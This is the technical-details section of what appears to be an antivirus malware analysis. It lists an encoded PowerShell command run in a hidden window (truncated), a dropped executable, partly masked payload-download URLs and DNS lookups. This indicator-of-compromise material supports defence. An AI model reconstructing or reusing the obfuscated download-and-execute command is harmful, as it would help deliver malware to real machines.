Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAE8ARgBFAEkAcABoAGEAPQAnAEkAWABHAFAAUAByAG4AcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQB0AHkAYABQAGAAUgBvAGAAVABgAG8AYwBvAEwAIgAgAD...
- %HOMEPATH%\739.exe
- %HOMEPATH%\739.exe
- http://www.mo###viseu.com/wp-content/jl173/
- http://mo###viseu.com/wp-content/jl173/
- http://bo####seafarms.com/images/30v/
- http://bo####seafarms.com/cgi-sys/suspendedpage.cgi
- http://in###mal.com/eazylot.com/ScVIwfSxR/
- http://in###mal.com/cgi-sys/suspendedpage.cgi
- http://ko##kon.com/cgi-bin/OAnF682/
- http://ni##id.com/assets/oHy758/
- DNS ASK mo###viseu.com
- DNS ASK bo####seafarms.com
- DNS ASK in###mal.com
- DNS ASK ko##kon.com
- DNS ASK ni##id.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAE8ARgBFAEkAcABoAGEAPQAnAEkAWABHAFAAUAByAG4AcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQB0AHkAYABQAGAAUgBvAGAAVABgAG8AYwBvAEwAIgAgAD...' (со скрытым окном)